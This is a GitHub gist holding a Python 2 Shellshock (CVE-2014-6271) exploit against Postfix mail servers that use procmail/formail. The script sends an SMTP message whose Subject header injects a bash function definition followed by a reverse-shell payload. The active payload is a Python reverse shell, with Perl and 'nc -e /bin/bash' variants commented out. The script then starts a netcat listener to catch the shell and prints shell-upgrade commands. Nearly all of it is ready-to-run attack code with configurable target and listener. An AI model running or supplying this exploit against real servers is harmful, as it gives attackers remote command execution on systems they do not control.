Last active
January 5, 2023 11:00
-
-
Save YSSVirus/0978adadbb8827b53065575bb8fbcb25 to your computer and use it in GitHub Desktop.
This is a shell shock exploit for smtp Post fix versions. The old script had a preset sender name i have made this a variable so its easily changeable because without that if you ctrl+c in a tab it clogs up the name making it unable to recieve new shell without reverting. This should make it alot easier! I also included rlwrap dependency on netc…
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
import sys,socket,subprocess | |
bnr = ''' | |
##################################################################################### | |
# postfix + procmail + formail ShellShock Exploit # | |
# Tested on: Debian 5 (postfix smtp,procmail) # | |
# By 3mrgnc3 06/02/2017 # | |
# CVE : 2014-6271 # | |
# Initiates a Reverse TCP connection # | |
# refs: https://www.exploit-db.com/exploits/34896/ # | |
# https://gist.github.com/claudijd/33771b6c17bc2e4bc59c # | |
# https://github.com/3mrgnc3/pentest_old/blob/master/postfix-shellshock-nc.py # | |
##################################################################################### | |
''' | |
try: | |
target = sys.argv[1] | |
email = sys.argv[2] | |
lhost = sys.argv[3] | |
lport = sys.argv[4] | |
sender = sys.argv[5] | |
except IndexError: | |
print bnr + '[!] A valid user email address on the target is required\r\n[?] Useage: %s <target-ip> <valid-email_or_name> <lhost> <lport> <Sender_Name>\r\n' % sys.argv[0] + '-' * 80 | |
sys.exit(1) | |
# reverse perl payload | |
#pld = '''perl -e 'use Socket;$i="''' + lhost + '''";$p=''' + lport + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};' ''' | |
# optional reverse python payload | |
pld = '''python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("''' + lhost + '''",''' + lport + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' ''' | |
# optional netcat payload | |
#pld = 'nc ' + lhost + ' ' + lport + ' -e /bin/bash' | |
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
try: | |
print '#' * 55 + '\r\n[*] Connecting to target...' | |
s.connect((target,25)) | |
s.recv(1024) | |
s.send('mail from:' + sender + '\r\n') | |
s.recv(1024) | |
s.send('rcpt to:<' + email + '>\r\n') | |
s.recv(1024) | |
s.send('data\r\n') | |
s.recv(1024) | |
s.send('To: <' + email + '>\r\nFrom: <' + email + '>\r\nSubject:() { :; };' + pld + '\r\nlove from 3mrgnc3\r\n\r\n.\r\nquit\r\n') | |
print "[*] Payload Sent.\r\n[*] Wait for incomming shell\r\n[!] To spawn an get out of a restricted shell" | |
print '''[!] Use: python -c 'import pty; pty.spawn("/bin/bash")'\r\n''' + '#'*55 | |
print "reset" | |
print "export SHELL=bash" | |
print "export TERM=xterm-256color" | |
print "stty rows 25 columns 115" | |
print '*'*55 | |
print "or if that doesnt work try" | |
print '*'*55 | |
print '''[!] Use: python -c 'import pty; pty.spawn("/bin/bash")'\r\n''' | |
print "reset" | |
print "export SHELL=bash" | |
print "export TERM=xterm" | |
print "stty rows 25 columns 115" | |
print '#'*55 | |
except: | |
print "[!] Can't connect to postfix Server! This means it is having an issue connect to the SMTP server..." | |
print "maybe use netcat to see if its online?" | |
lnr = "rlwrap -r -f . nc -s " + lhost + " -nlp " + lport | |
try: | |
ncl = subprocess.Popen(lnr, shell=True) | |
ncl.poll() | |
ncl.wait() | |
except: | |
print "\r[!] Shell Terminated! Do not use same sender name next time if using against same target" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment